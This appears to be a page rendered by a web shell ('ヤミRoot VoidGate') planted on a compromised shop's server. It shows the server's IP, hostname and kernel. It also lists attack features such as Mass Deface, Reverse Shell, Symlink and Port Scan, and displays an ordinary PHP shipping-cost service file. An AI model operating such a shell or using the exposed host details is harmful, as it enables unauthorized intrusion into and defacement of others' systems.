ヤミRoot VoidGate
User / IP
:
216.73.217.162
Host / Server
:
15.235.182.215 / pollibazaar.com
System
:
Linux asia.cbnex.com 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
pollibazaar
/
public_html
/
app
/
Services
/
Viewing: CategoryShippingCostService.php
<?php namespace App\Services; class CategoryShippingCostService { /** * @param string $addedBy * @param int|string $id * @return array */ public function getAddCategoryWiseShippingCostData(string $addedBy, int|string $id): array { return [ 'seller_id' => $addedBy === 'seller' ? auth('seller')->id() : 0, 'category_id' => $id, 'cost' => 0, ]; } /** * @param int $key * @param int|string $id * @param object $request * @return array */ public function getUpdateCategoryWiseShippingData(int $key, int|string $id, object $request): array { return [ 'cost' => currencyConverter($request['cost'][$key], 'usd'), 'multiply_qty' => isset($request['multiplyQTY']) ? (in_array($id, $request['multiplyQTY']) ? 1 : 0) : 0 ]; } }
Coded With 💗 by
0x6ick